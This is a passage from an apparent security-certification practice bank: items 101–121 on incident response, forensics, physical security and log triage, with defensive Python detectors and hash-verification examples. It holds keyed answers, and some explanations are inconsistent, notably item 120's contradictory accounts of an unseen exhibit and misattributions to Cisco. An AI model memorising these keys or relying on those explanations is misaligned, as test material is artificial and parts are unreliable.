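    users = len({e.user for e in burst})
    if len(burst) < min_failures:
        return Finding(src, "none", len(burst), users, None,
                       "below burst threshold; ordinary monitoring")
    success = next((e for e in events if e.src == src and e.result == "success"
                    and e.ts >= burst[-1].ts), None)
    if users >= spray_users:
        # A few guesses per account across many accounts avoids lockout: spraying.
        return Finding(src, "password_spray", len(burst), users, success,
                       "likely spray-to-compromise; review the successful login and new "
                       "mailbox rules, then contain the affected account")
    # Many guesses against one account: brute force, or a user mistyping repeatedly.
    return Finding(src, "brute_force", len(burst), users, success,
                   "correlate with VPN records and user activity to confirm before "
                   "any disruptive action")


def constructed_sample_log() -> str:
    """Build the two question scenarios plus an innocent mistyped password as log lines."""
    base = datetime(2024, 5, 1, 8, 0, 0)
    lines = []
    # Scenario 1: 38 failures on one finance account over 4 minutes, then one success.
    for k in range(38):
        lines.append(f"{(base + timedelta(seconds=6 * k)).isoformat()} "
                     f"auth=failure user=fin.user src=198.51.100.7")
    lines.append(f"{(base + timedelta(minutes=4)).isoformat()} auth=success user=fin.user src=198.51.100.7")
    # Scenario 2: 47 failures, one per account, over about 14 minutes, then a success on one.
    for k in range(47):
        lines.append(f"{(base + timedelta(minutes=30, seconds=18 * k)).isoformat()} "
                     f"auth=failure user=user{k:02d} src=203.0.113.25")
    lines.append(f"{(base + timedelta(minutes=45)).isoformat()} auth=success user=user31 src=203.0.113.25")
    # Background: one mistyped password from an unrelated user, which must not be flagged.
    lines.append(f"{(base + timedelta(hours=1)).isoformat()} auth=failure user=ops.user src=192.0.2.9")
    lines.append(f"{(base + timedelta(hours=1, seconds=20)).isoformat()} auth=success user=ops.user src=192.0.2.9")
    return "\n".join(lines)


SAMPLE_LOG = constructed_sample_log()
```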

101
Multi-Select · hard

After a ransomware incident, management says backups are available but will not approve closure until the team proves the restore process works without risking production data. Which two actions best validate recoverability? Select two.

Select 2 answers
A. Restore a recent backup to an isolated test system that mirrors production.
B. Verify file integrity and application functionality after the restore completes.
C. Increase backup retention without testing the restore process.
D. Keep the original ransomware-affected server online until the backup is approved.
E. Use the backup job report as proof that the data can be recovered.
Answers: A, B

A test restore proves the backup can be read and expanded into a usable system without impacting live production.

Why this answer

Restoring to an isolated test system that mirrors production (Option A) is correct because it validates the backup's integrity and the restore process without any risk to the live production environment. This approach ensures the backup data is readable and the restoration steps are documented and repeatable, directly addressing management's requirement to prove recoverability without endangering production data.

Exam trap

CompTIA often tests the misconception that a backup job report or increased retention alone proves recoverability, when in fact only a successful restore to a test environment with validation steps can confirm that the data is usable and the process works.

102
MCQ · medium

A security analyst in the SOC observes a sudden spike in failed authentication attempts from a single external IP address targeting multiple user accounts over the last 30 minutes. After confirming the logs are accurate, which of the following actions should the analyst take FIRST according to standard incident response procedures?

A. Block the IP address at the firewall immediately.
B. Disable all user accounts that were targeted.
C. Escalate the incident to the incident response team.
D. Capture a memory dump of all affected servers.
Answer: C

Escalation is the first step after detection. The incident response team will follow the organization's plan to analyze, contain, eradicate, and recover from the incident. This ensures a coordinated and controlled response.

Why this answer

Option C is correct because, according to standard incident response procedures (NIST SP 800-61), the first step after confirming an anomaly is to escalate the incident to the incident response team. This ensures that a coordinated, documented, and legally defensible response is initiated, rather than taking unilateral action that could destroy evidence or disrupt legitimate services. The SOC analyst's role is to detect and validate, not to independently execute containment measures without authorization.

Exam trap

The trap here is that candidates often confuse 'immediate containment' with 'first action,' forgetting that escalation and validation must precede any technical countermeasure to ensure proper evidence preservation and coordinated response.

How to eliminate wrong answers

Option A is wrong because immediately blocking the IP address at the firewall could be an overreaction—the IP might be a legitimate proxy or VPN used by multiple users, and blocking it could disrupt business operations and destroy forensic evidence of the attack chain. Option B is wrong because disabling all targeted user accounts without investigation could lock out legitimate users who were not compromised, and it does not address the root cause (the external attacker), potentially allowing the attacker to pivot to other accounts or methods.

103
MCQ · medium

A security analyst notices repeated attempts to copy large amounts of data to USB drives from a user's workstation. The analyst suspects the user may be exfiltrating company proprietary data. The company wants to implement a technical control that can both detect and block such data exfiltration without completely disabling all USB ports, as some users require USB for authorized work. Which of the following would best meet this requirement?

A. Implement a host-based intrusion detection system (HIDS) that alerts on USB insertion events.
B. Deploy a data loss prevention (DLP) agent configured with rules to monitor and block unauthorized data transfers to removable media.
C. Enable BitLocker encryption on all USB drives to prevent unauthorized data access.
D. Configure the local group policy to disable all USB ports on all workstations.
Answer: B

A DLP agent can inspect data in real time, apply policies to classify sensitive content, and block transfers that violate company rules. This meets the need to both detect and block exfiltration while still permitting authorized USB use.

Why this answer

Option B is correct because a Data Loss Prevention (DLP) agent can be configured with granular rules to monitor and block unauthorized data transfers to removable media (e.g., USB drives) based on content inspection, file type, or volume thresholds. This allows authorized USB usage while preventing exfiltration of proprietary data, meeting the requirement for both detection and blocking without disabling all USB ports.

Exam trap

The trap here is that candidates often confuse detection-only controls (like HIDS alerts) with prevention controls, or they assume encryption (BitLocker) can stop data exfiltration, when in fact encryption only protects data at rest and does not prevent copying from the host.

How to eliminate wrong answers

Option A is wrong because a host-based intrusion detection system (HIDS) can only alert on USB insertion events but cannot block data transfers, so it fails to meet the requirement for blocking exfiltration. Option C is wrong because BitLocker encryption protects data at rest on USB drives from unauthorized access if the drive is lost, but it does not monitor or block the act of copying data to the drive from the workstation. Option D is wrong because disabling all USB ports via group policy would block all USB usage, including authorized work, which directly contradicts the requirement to allow some users to use USB for legitimate purposes.

104
MCQ · medium

A data center has repeated tailgating incidents at the entry to the server room. Management wants a control that forces one person to pass after badge authentication and prevents two people from entering together. What should be installed?

A. A mantrap between the outer door and the server room entrance
B. A CCTV camera focused on the doorway
C. A motion sensor inside the server room
D. A standard badge reader with no additional controls
Answer: A

A mantrap is designed to prevent tailgating by allowing only one person to pass through at a time after authentication. It is the best control for physically enforcing single-person entry.

Why this answer

A mantrap is a physical security control with two interlocking doors that enforces one-person entry. After badge authentication at the outer door, the inner door will not unlock until the outer door closes and locks, preventing two people from entering together. This directly addresses tailgating by creating a small vestibule that can only hold one authenticated person at a time.

Exam trap

Cisco often tests the distinction between passive monitoring (CCTV) and active prevention (mantrap), leading candidates to mistakenly choose CCTV because they think recording alone will deter tailgating.

How to eliminate wrong answers

Option B is wrong because a CCTV camera only provides passive monitoring and does not physically prevent two people from entering together; it records incidents but does not enforce access control. Option C is wrong because a motion sensor inside the server room detects movement after entry but cannot stop tailgating at the door; it might even trigger false alarms from authorized occupants. Option D is wrong because a standard badge reader with no additional controls allows anyone to follow an authenticated user through the door without any physical barrier or detection mechanism to prevent tailgating.

105
MCQ · easy

A SOC analyst wants to make sure logs from multiple servers can be compared accurately during an incident review. What should be configured on those systems?

A. A local administrator account with the same password on every server
B. Time synchronization using the same trusted time source
C. A larger disk size on the log server
D. A separate VLAN for each application server
Answer: B

Consistent timestamps are essential for correlating events from different systems during investigation.

Why this answer

Time synchronization using a trusted time source (e.g., NTP) ensures that all servers share the same clock. During incident review, accurate log correlation depends on timestamps being consistent across systems; even a few seconds of drift can misalign event sequences. Without synchronized time, comparing logs from multiple servers becomes unreliable, potentially obscuring the true timeline of an attack.

Exam trap

The trap here is that candidates may confuse administrative convenience (same password) or storage capacity with the fundamental need for temporal consistency, overlooking that log correlation depends on synchronized clocks, not identical credentials or disk space.

How to eliminate wrong answers

Option A is wrong because using a local administrator account with the same password on every server violates the principle of least privilege and creates a massive security risk—if one server is compromised, all servers are exposed. It does nothing to ensure log timestamps are consistent. Option C is wrong because increasing disk size on the log server only addresses storage capacity, not the accuracy of timestamp comparisons across servers; logs can still have misaligned times even if storage is abundant.

106
MCQ · medium

A security analyst detects real-time data exfiltration from a critical production database that supports customer transactions. The exfiltration appears to be occurring via a compromised application service account. Which containment strategy should the analyst implement FIRST to minimize damage while preserving forensic data?

A. Disconnect the database server from the network.
B. Shut down the database server.
C. Implement network segmentation to isolate the server.
D. Block the IP address of the suspected attacker.
Answer: A

Correct. Disconnecting the server immediately stops the data flow to the attacker, preserving the database state and forensic data without crashing the server.

Why this answer

Disconnecting the database server from the network (Option A) immediately stops the active data exfiltration by severing all network communication, including the compromised service account's outbound connections. This preserves the server's volatile memory, running processes, and disk state for forensic analysis, unlike a shutdown which would destroy critical evidence. It is the fastest containment action that minimizes data loss while maintaining the integrity of forensic artifacts.

Exam trap

Cisco often tests the misconception that shutting down a server is the safest containment action, but the trap here is that shutdown destroys volatile forensic data (e.g., active network connections, memory-resident malware) that is critical for attribution and root cause analysis.

How to eliminate wrong answers

Option B is wrong because shutting down the database server would terminate all processes, clear volatile memory (RAM), and potentially destroy evidence of the exfiltration (e.g., active network connections, malicious processes, or in-memory payloads), making forensic analysis impossible. Option C is wrong because implementing network segmentation takes time to configure and deploy, during which the exfiltration continues; it is a longer-term containment measure, not a first-response action to stop an active breach.

107
MCQ · medium

A server room uses raised flooring and sits below a chilled-water pipe. Facilities wants the earliest warning if water starts accumulating under the floor tiles. Which control should be added?

A. Add more motion detectors near the racks.
B. Use badge readers on the server room door.
C. Install smoke detectors only.
D. Install leak-detection sensors or a moisture detection cable tied to alerts.
Answer: D

Leak-detection sensors placed under the floor can detect water as soon as it appears, which is exactly what facilities wants here. Early warning lets staff respond before equipment is damaged or a larger outage occurs. For a room below a chilled-water pipe, environmental monitoring is more effective than access control or motion detection because the hazard is liquid intrusion rather than unauthorized entry.

Why this answer

Option D is correct because leak-detection sensors or moisture-detection cables are specifically designed to detect water accumulation under raised floors, providing the earliest possible warning. These sensors trigger alerts when moisture is present, allowing facilities to respond before water damages equipment or causes downtime. This directly addresses the risk of a chilled-water pipe leak in a server room environment.

Exam trap

The trap here is that candidates may confuse environmental monitoring controls (like leak detection) with physical security controls (like motion detectors or badge readers), or assume smoke detectors are sufficient for all hazard detection, when they are specific to fire only.

How to eliminate wrong answers

Option A is wrong because motion detectors detect movement (e.g., people or objects) and cannot sense water or moisture, so they provide no warning of a water leak. Option B is wrong because badge readers control physical access to the server room but do not detect environmental hazards like water accumulation. Option C is wrong because smoke detectors are designed to detect smoke or fire, not water; they would not activate until a fire occurs, missing the water leak entirely.

108
Multi-Select · easy

After collecting a suspect laptop, the responder makes a bit-for-bit image of the drive. Which two actions best support chain of custody? Select two.

Select 2 answers
A. Calculate and record a cryptographic hash of the image.
B. Document every evidence transfer with date, time, and handler names.
C. Browse the original drive on a normal office laptop.
D. Rename files to make them easier for later review.
E. Store the image on a shared folder without access controls.
Answers: A, B

A hash provides a repeatable way to show whether the image has changed or stayed the same.

Why this answer

Option A is correct because calculating and recording a cryptographic hash (e.g., SHA-256) of the bit-for-bit image creates a digital fingerprint that can later be used to verify the image has not been altered. This ensures data integrity, a core requirement for maintaining chain of custody in digital forensics.

Exam trap

The trap here is that candidates may think browsing the original drive is acceptable if done carefully, but any direct access to the original evidence modifies it and breaks the forensic integrity chain.

109
Multi-Select · hard

An analyst receives a disk image and the original hash from a response team member. Before any examination begins, the analyst must be able to show the image is unchanged and that the evidence handling process is defensible. Which two actions are most important? Select two.

Select 2 answers
A. Recompute the SHA-256 hash of the received image and compare it to the acquisition record.
B. Mount the original disk read/write so the file system can repair itself before analysis.
C. Record the transfer, date, time, and handler names in the chain-of-custody log.
D. Convert the image to another format before hashing so the tool can open it.
E. Rename evidence files to match the case number and avoid confusion.
Answers: A, C

Hash verification proves the image bytes match what was originally collected and have not changed in transit.

Why this answer

Recomputing the SHA-256 hash of the received image and comparing it to the original acquisition record is essential to verify data integrity. SHA-256 is a cryptographic hash function that produces a unique fixed-size output; if even one bit of the image changes, the hash will differ. This comparison proves the image has not been altered during transit or storage, which is a foundational requirement for maintaining forensic soundness.

Exam trap

The trap here is that candidates may think mounting the image read/write (Option B) is acceptable for file system repair, but any write operation violates forensic integrity principles and invalidates the hash comparison.

110
Drag & Drop · medium

Drag and drop the steps to implement a backup strategy following the 3-2-1 rule into the correct order.


Why this order

The 3-2-1 rule ensures redundancy: three copies, two different media, one offsite. Testing is crucial to verify recoverability.

111
MCQ · medium

A help desk technician receives an alert that an unmanaged laptop was plugged into a conference room network jack and was automatically placed into a restricted network segment until it passed a security check. Which control is responsible for that behavior?

A. Network access control (NAC).
B. Data loss prevention (DLP).
C. Intrusion prevention system (IPS).
D. Sandboxing gateway.
Answer: A

NAC can authenticate devices, check posture, and place noncompliant systems into a limited or quarantine network segment.

Why this answer

Network Access Control (NAC) is the correct answer because it is specifically designed to enforce security policies on devices attempting to connect to a network. When an unmanaged laptop is plugged into a network jack, NAC evaluates the device's compliance (e.g., antivirus status, patch level) and, if it fails, automatically places it into a restricted segment (e.g., a quarantine VLAN) until it passes a security check. This behavior is a core function of NAC solutions like Cisco ISE or Aruba ClearPass, which use 802.1X or MAC authentication bypass to dynamically assign VLANs based on device posture.

Exam trap

The trap here is that candidates often confuse NAC with an IPS or firewall because both can block traffic, but NAC specifically controls access at the point of network entry (Layer 2) based on device identity and compliance, not by inspecting packet payloads.

How to eliminate wrong answers

Option B is wrong because Data Loss Prevention (DLP) focuses on monitoring and preventing unauthorized transmission of sensitive data, not on controlling network access or quarantining devices. Option C is wrong because an Intrusion Prevention System (IPS) inspects network traffic for malicious patterns and blocks attacks, but it does not enforce pre-admission security checks or dynamically segment devices based on compliance. Option D is wrong because a sandboxing gateway detonates suspicious files in an isolated environment to analyze behavior, but it does not manage network access or quarantine endpoints at the switch port level.

112
Multi-Select · hard

A records room has repeated tailgating after hours and occasional door propping during deliveries. Management wants one control that prevents follow-on entry and another that immediately alerts security if the door is forced open or left ajar. Which two controls best meet the need? Select two.

Select 2 answers
A. Install a mantrap at the room entrance.
B. Add a door position sensor tied to an alarm or SIEM alert.
C. Place a larger warning sign on the wall beside the door.
D. Mount a visible camera over the door only.
E. Replace the mechanical lock with the same type of lock and no monitoring.
Answers: A, B

A mantrap allows only one person, or one credentialed entry, through at a time, which directly reduces tailgating.

Why this answer

A mantrap (option A) prevents tailgating by requiring one door to close before the next can open, effectively stopping follow-on entry. A door position sensor (option B) detects when the door is forced open or left ajar and triggers an immediate alert to security via an alarm or SIEM integration, meeting the requirement for real-time notification.

Exam trap

The trap here is that candidates often choose a camera (option D) thinking it provides real-time alerting, but a standard visible camera without integrated analytics does not automatically alert on door status—it only records footage for later review.

113
MCQ · easy

A critical patch must be applied to a production server next week. What is the best way to reduce the risk of downtime if the patch causes a problem?

A. Apply the patch during business hours so users can report issues quickly
B. Create a rollback plan before installing the patch
C. Skip testing because critical patches are always safe
D. Disable logging during the patch to improve performance
Answer: B

A rollback plan allows the team to return to a known good state if the patch fails.

Why this answer

Option B is correct because creating a rollback plan before installing a patch ensures that if the patch causes unexpected issues, the system can be restored to its previous stable state quickly, minimizing downtime. A rollback plan typically includes steps to revert the patch, restore from a backup, or switch to a failover system, which is a fundamental change management practice in security operations.

Exam trap

The trap here is that candidates may assume applying a patch during business hours allows for quick user feedback, but this overlooks the higher risk of widespread disruption and the importance of a controlled maintenance window.

How to eliminate wrong answers

Option A is wrong because applying a patch during business hours increases the risk of disrupting users and operations; patches should be applied during maintenance windows to minimize impact. Option C is wrong because skipping testing is dangerous even for critical patches, as they can still introduce compatibility issues or break existing functionality; testing in a non-production environment is essential. Option D is wrong because disabling logging during a patch removes the ability to audit changes and troubleshoot problems, which could lead to undetected issues and longer downtime.

114
Multi-Select · easy

A data center wants to reduce tailgating at a sensitive room entrance. Which two controls are most effective? Select two.

Select 2 answers
A. A mantrap that allows only one person through at a time.
B. A turnstile or other one-person entry control.
C. A standard badge reader without anti-passback.
D. A motion sensor in the hallway.
E. A visitor sign-in sheet at the front desk.
Answers: A, B

A mantrap forces one person through at a time and blocks piggybacking.

Why this answer

A mantrap is a small room with two interlocking doors that allows only one person to enter at a time, physically preventing tailgating by trapping unauthorized individuals between the doors. This control enforces strict one-person entry and is highly effective against tailgating in high-security areas.

Exam trap

The trap here is that candidates may confuse administrative controls like sign-in sheets or detection controls like motion sensors with physical deterrents, failing to recognize that only physical barriers like mantraps and turnstiles actively prevent tailgating.

115
MCQ · easy

A help desk team needs to update desktops in a call center without interrupting callers during peak hours. What is the best operational approach?

A. Deploy the updates immediately to all desktops at once
B. Schedule the updates during an approved maintenance window
C. Ask each user to install updates whenever they have time
D. Disable update notifications permanently
Answer: B

A maintenance window reduces user impact and gives the team predictable time to monitor the changes.

Why this answer

Scheduling updates during an approved maintenance window ensures that desktops are updated during a period of low activity, minimizing disruption to call center operations. This approach aligns with change management best practices, allowing for controlled deployment and rollback if issues arise, and avoids the performance degradation or reboots that could interrupt active calls.

Exam trap

The trap here is that candidates may choose immediate deployment (A) thinking it is the most efficient for security, overlooking the operational requirement to maintain service availability during peak hours.

How to eliminate wrong answers

Option A is wrong because deploying updates immediately to all desktops at once risks simultaneous reboots or performance slowdowns during peak hours, which would directly interrupt callers and violate availability requirements. Option C is wrong because asking each user to install updates whenever they have time lacks coordination and control; users may forget, delay, or apply updates inconsistently, leading to security gaps and unpredictable system behavior.

116
MCQ · easy

A Linux server starts showing many failed SSH logins from one source IP address. Which log source should the analyst review first?

A. The system authentication log
B. The printer spooler log
C. The browser history log
D. The backup completion log
Answer: A

This is the best choice because authentication logs record login attempts, failures, and success events. For SSH activity, the auth log or equivalent security log is the most direct place to confirm whether the attempts are real, what accounts were targeted, and whether any successful logon followed the failures. It provides the most useful first evidence for triage.

Why this answer

The system authentication log (e.g., /var/log/auth.log or /var/log/secure) records all SSH login attempts, including failed ones, along with source IP addresses. This is the primary log source for investigating authentication failures on Linux systems, as it captures PAM (Pluggable Authentication Module) events and SSH daemon messages.

Exam trap

The trap here is that candidates might confuse system authentication logs with generic system logs (e.g., /var/log/messages) or assume that SSH failures would be recorded in a network-level log, but the exam specifically tests knowledge of Linux authentication logging mechanisms.

How to eliminate wrong answers

Option B is wrong because the printer spooler log (e.g., /var/log/cups/) tracks print jobs and printer errors, not network authentication events like SSH logins. Option C is wrong because browser history logs are client-side records of web browsing activity, unrelated to server-side SSH authentication attempts. Option D is wrong because the backup completion log (e.g., /var/log/backup.log) records backup job statuses, not real-time authentication failures from remote IP addresses.
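The triage the explanation describes, as an added example that is not part of the question bank: it reads sshd lines in the format used in /var/log/auth.log or /var/log/secure, counts failures per source IP, lists the targeted accounts, and, most importantly, records whether a successful login from the same source followed the failures. The log lines below are constructed to mimic OpenSSH's "Failed password" and "Accepted" messages; host names, addresses and account names are assumptions.

```python
# Added example, not part of the question bank: triage of SSH failures from
# the authentication log. The sample lines are constructed to mimic the
# OpenSSH message formats found in /var/log/auth.log or /var/log/secure.
import re
from collections import defaultdict

SAMPLE_AUTH_LOG = """\
May  1 10:00:01 web01 sshd[2311]: Failed password for root from 198.51.100.7 port 50112 ssh2
May  1 10:00:03 web01 sshd[2313]: Failed password for invalid user admin from 198.51.100.7 port 50118 ssh2
May  1 10:00:05 web01 sshd[2315]: Failed password for invalid user oracle from 198.51.100.7 port 50120 ssh2
May  1 10:00:08 web01 sshd[2317]: Failed password for deploy from 198.51.100.7 port 50124 ssh2
May  1 10:00:11 web01 sshd[2319]: Accepted password for deploy from 198.51.100.7 port 50130 ssh2
May  1 10:02:40 web01 sshd[2350]: Accepted publickey for alice from 10.0.0.15 port 41200 ssh2
May  1 10:03:02 web01 CRON[2360]: pam_unix(cron:session): session opened for user root by (uid=0)
"""

# "invalid user" appears when the account does not exist on the host; the
# optional group makes both message variants parse the same way.
FAILED_RE = re.compile(
    r"sshd\[\d+\]: Failed \w+ for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)"
)
ACCEPTED_RE = re.compile(
    r"sshd\[\d+\]: Accepted \w+ for (?P<user>\S+) from (?P<ip>\S+)"
)


def triage_ssh(log_text: str):
    """Summarise SSH authentication activity per source IP.

    Each entry holds the failure count, the set of accounts tried, and the
    accounts that logged in successfully from that IP after failures had
    already been seen. That last field is the "did they get in?" signal.
    """
    stats = defaultdict(
        lambda: {"failures": 0, "targets": set(), "success_after_failures": []}
    )
    for line in log_text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            s = stats[m["ip"]]
            s["failures"] += 1
            s["targets"].add(m["user"])
            continue
        m = ACCEPTED_RE.search(line)
        if m:
            s = stats[m["ip"]]
            if s["failures"] > 0:
                s["success_after_failures"].append(m["user"])
    return dict(stats)


def suspicious_sources(log_text: str, threshold: int = 3):
    """Sources with at least `threshold` failures; those that then succeeded sort first."""
    stats = triage_ssh(log_text)
    flagged = [(ip, s) for ip, s in stats.items() if s["failures"] >= threshold]
    flagged.sort(key=lambda kv: (not kv[1]["success_after_failures"], -kv[1]["failures"]))
    return flagged


if __name__ == "__main__":
    for ip, s in suspicious_sources(SAMPLE_AUTH_LOG):
        print(ip, s["failures"], "failures, accounts tried:", sorted(s["targets"]),
              "successful after failures:", s["success_after_failures"])
```

In the sample, the burst from 198.51.100.7 ends with an accepted password for `deploy`, which is the finding that turns a noisy brute-force alert into an incident: that account's session and anything it did next need review, while the unrelated key-based login from 10.0.0.15 is left alone.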

117
Multi-Select · hard

A responder has imaged a suspect laptop and needs to preserve the evidence for possible legal action. Which three actions best support chain of custody and admissibility? Select three.

Select 3 answers
A. Document the evidence identifier, collector, date, time, and location on the chain-of-custody form.
B. Calculate and record cryptographic hashes for the original evidence and the forensic image.
C. Place the original device in a sealed, access-controlled evidence locker after collection.
D. Mount the original drive read/write so investigators can search it faster.
E. Rename the image file to match the case number before hashing it.
Answers: A, B, C

Complete documentation shows who handled the evidence and when, which helps establish a defensible custody history.

Why this answer

Option A is correct because documenting the evidence identifier, collector, date, time, and location on the chain-of-custody form establishes a clear, auditable record of who handled the evidence and when. This documentation is essential for proving the evidence has not been tampered with and is admissible in court. Without this detailed logging, the chain of custody is broken, and the evidence may be challenged.

Exam trap

The trap here is that candidates may think renaming a file is harmless, but any alteration—including metadata changes—breaks the hash integrity required for evidence admissibility.
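Questions 108, 109 and 117 all turn on the same two mechanics: recomputing the image's SHA-256 and comparing it with the acquisition record, and writing each handling step into a custody record. The following is an added example, not code from the question bank, that does both. The image bytes, evidence identifier and handler name are constructed placeholders; in practice the recorded hash comes from the acquisition form, not from the image in hand.

```python
# Added example, not the question bank's code: recompute a disk image's
# SHA-256, compare it with the acquisition record, and write the result into
# a chain-of-custody entry. Image bytes, identifiers and names are constructed.
import hashlib
import io
from datetime import datetime, timezone


def sha256_stream(fileobj, chunk_size: int = 1 << 20) -> str:
    """Hash in fixed-size chunks so a multi-terabyte image never has to fit in RAM."""
    h = hashlib.sha256()
    for chunk in iter(lambda: fileobj.read(chunk_size), b""):
        h.update(chunk)
    return h.hexdigest()


def sha256_bytes(data: bytes) -> str:
    return sha256_stream(io.BytesIO(data))


def sha256_file(path) -> str:
    with open(path, "rb") as f:
        return sha256_stream(f)


def hashes_match(computed: str, recorded: str) -> bool:
    """Compare digests case-insensitively, ignoring whitespace copied from a form."""
    return computed.strip().lower() == recorded.strip().lower()


def custody_entry(evidence_id, action, handler, computed_hash, recorded_hash, when=None):
    """One chain-of-custody record: who did what, when, and whether the hash still matched."""
    when = when or datetime.now(timezone.utc)
    return {
        "evidence_id": evidence_id,
        "action": action,
        "handler": handler,
        "timestamp_utc": when.strftime("%Y-%m-%dT%H:%M:%SZ"),
        "sha256": computed_hash.strip().lower(),
        "hash_verified": hashes_match(computed_hash, recorded_hash),
    }


# Constructed stand-in for a disk image. RECORDED_HASH is computed here only so
# the example is self-contained; a real one is copied from the acquisition form.
SAMPLE_IMAGE = b"\x00" * 512 + b"NTFS    " + b"\xa5" * 4096
RECORDED_HASH = sha256_bytes(SAMPLE_IMAGE)


def tampered_copy(image: bytes, byte_index: int = 2000) -> bytes:
    """Flip a single bit: enough to make the digest completely different."""
    b = bytearray(image)
    b[byte_index] ^= 0x01
    return bytes(b)


if __name__ == "__main__":
    for label, data in (("received image", SAMPLE_IMAGE),
                        ("one bit flipped", tampered_copy(SAMPLE_IMAGE))):
        entry = custody_entry("EV-PLACEHOLDER-001", "received", "analyst (placeholder)",
                              sha256_bytes(data), RECORDED_HASH)
        print(f"{label}: verified={entry['hash_verified']} sha256={entry['sha256'][:16]}...")
```

Two points worth noting for the exam traps above: the hash is recomputed over the image as received, never over a converted or renamed copy, and the custody entry records the verification outcome alongside who handled it and when, so a later challenge can be answered from the log rather than from memory.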

118
MCQ · medium

A security analyst in the SOC is reviewing an alert from the corporate VPN server. The alert indicates that user 'jsmith' authenticated successfully from an IP address in Brazil at 14:30 UTC. The analyst contacts jsmith, who confirms he is physically in the company's headquarters in Chicago and has not remotely accessed the VPN today. The VPN authentication logs show that jsmith's session used a valid smart card certificate for authentication. The analyst checks the certificate revocation list and finds that jsmith's certificate has not been revoked. Which of the following is the most likely explanation for this event?

A. The user's smart card and PIN were stolen, allowing an attacker to authenticate from Brazil.
B. An attacker performed a pass-the-hash attack using cached credentials from jsmith's workstation.
C. The VPN server's certificate was forged, allowing the attacker to intercept jsmith's credentials.
D. The user's account password was guessed through a brute-force attack and then used to create a new certificate.
Answer: A

Correct. Smart card authentication requires possession of the physical card and the PIN. If both are stolen, an attacker can impersonate the user.

Why this answer

Option A is correct because the scenario describes a successful VPN authentication using a valid smart card certificate from a location (Brazil) that the legitimate user (jsmith) denies accessing. Since the certificate was not revoked and the smart card requires both the card and PIN for use, the most plausible explanation is that both were stolen, enabling an attacker to authenticate as jsmith. The certificate revocation list (CRL) check confirms the certificate is still valid, ruling out revocation-based defenses, and the user's physical presence in Chicago eliminates the possibility of a legitimate remote session.

Exam trap

The trap here is that candidates may assume a valid certificate and successful authentication imply the user is legitimate, overlooking that physical theft of the smart card and PIN allows an attacker to authenticate as the user without any cryptographic anomaly.

How to eliminate wrong answers

Option B is wrong because a pass-the-hash attack exploits NTLM hash caching for authentication, but the VPN session used a smart card certificate (PKI-based authentication), not a password hash. Pass-the-hash is irrelevant to certificate-based authentication mechanisms. Option C is wrong because a forged VPN server certificate would enable a man-in-the-middle attack to intercept credentials, but it would not allow an attacker to authenticate as jsmith using his valid smart card certificate; the attacker would need jsmith's private key and PIN, which are not obtained by forging the server certificate.

119
MCQ · medium

EDR alerts on a remote laptop show a suspicious process attempting to dump browser credentials and then contacting a rare domain. The user is in another time zone and still needs the laptop online for a presentation later today. What containment action is best?

A. Remotely isolate the device through the EDR console while keeping it powered on.
B. Ask the user to uninstall the EDR agent and reboot the laptop.
C. Wait until after the presentation and then begin containment.
D. Email the user asking them to close the browser and log out of their accounts.
Answer: A

EDR isolation is the best containment action because it stops most network communication while preserving the device state for investigation. Keeping the endpoint powered on maintains access to volatile evidence and avoids unnecessary disruption to disk contents or running processes. This is especially useful when the user is remote, because it can contain the threat quickly without requiring physical access or a full shutdown that would erase useful forensic data.

Why this answer

Remotely isolating the device through the EDR console is the best containment action because it immediately blocks all network communication to and from the laptop while keeping it powered on and running. This prevents the suspicious process from exfiltrating browser credentials or communicating with the rare command-and-control domain, yet allows the user to continue using local applications for the presentation later today. EDR isolation typically works by applying a host-based firewall rule that drops all traffic except to the EDR management server, ensuring the threat is contained without disrupting local productivity.

Exam trap

The trap here is that candidates may choose to wait until after the presentation (Option C) due to business continuity concerns, failing to recognize that immediate containment via network isolation can preserve both security and productivity.

How to eliminate wrong answers

Option B is wrong because asking the user to uninstall the EDR agent removes the very tool needed to monitor and contain the threat, leaving the laptop defenseless and potentially allowing the malicious process to continue unchecked. Option C is wrong because waiting until after the presentation gives the attacker time to exfiltrate sensitive credentials and establish persistence, violating the fundamental incident response principle of immediate containment. Option D is wrong because emailing the user to close the browser and log out does not stop the suspicious process from running in the background or prevent it from communicating with the rare domain, and the user may not act promptly or correctly.

120
MCQ · medium

Based on the exhibit, what is the most likely explanation for the alert?

A. The workstation has been redirected to an approved corporate proxy, so the event is expected.
B. A DNS cache poisoning attack is in progress and the workstation is now using a rogue gateway.
C. The endpoint is infected with malware that is hiding its traffic through encrypted tunnels.
D. The workstation is under a denial-of-service attack because it sent repeated DNS lookups.
Answer: A

The exhibit shows the workstation resolving WPAD, retrieving the proxy auto-configuration file, and then sending traffic to the approved proxy listed in inventory. Those steps match normal browser proxy discovery, not malicious behavior. Because the destination is the known corporate proxy, the alert should be validated as legitimate and then tuned if it repeatedly fires on the same approved sequence.

Why this answer

The alert indicates that the workstation's DNS traffic is being redirected to an internal proxy server (10.0.0.53), which is a common configuration in corporate environments for content filtering and security monitoring. Since the destination IP (10.0.0.53) is within the organization's private IP range and the proxy is explicitly approved, this behavior is expected and not malicious. The event is consistent with a transparent proxy or DNS-based proxy redirection, where the workstation's DNS queries are intercepted and forwarded to the corporate proxy.

Exam trap

The trap here is that candidates often assume any DNS redirection to an internal IP indicates a man-in-the-middle attack or DNS poisoning, but they overlook that corporate proxies legitimately use this technique for security monitoring and content filtering.

How to eliminate wrong answers

Option B is wrong because DNS cache poisoning would involve a rogue DNS server returning forged responses, not a consistent redirection to an internal proxy IP; the exhibit shows the workstation's DNS queries going to 10.0.0.53, which is a private IP, not a spoofed external address. Option C is wrong because malware using encrypted tunnels would typically show traffic to an external C2 server over protocols like HTTPS or DNS over HTTPS, not a consistent pattern of DNS queries to a known internal proxy IP. Option D is wrong because a denial-of-service attack would involve an overwhelming volume of traffic or resource exhaustion, not a single workstation sending DNS lookups to a proxy; repeated DNS lookups alone do not indicate a DoS attack.

121
MCQ · medium

A security analyst at a manufacturing company notices multiple workstations generating high volumes of encrypted outbound traffic and displaying ransom notes. The analyst suspects a ransomware outbreak. According to the incident response process, which of the following should the analyst perform FIRST?

A. Immediately wipe the hard drives of all affected workstations and reinstall the operating system.
B. Isolate the affected workstations from the network by disconnecting their network cables and disabling Wi-Fi.
C. Contact local law enforcement to report the ransomware incident and request a forensic investigation.
D. Conduct a full forensic analysis of one affected workstation to determine the ransomware variant and entry vector.
Answer: B

This is the correct first step. Rapid containment (isolation) limits the scope of the incident and prevents the ransomware from encrypting additional systems or exfiltrating data.

Why this answer

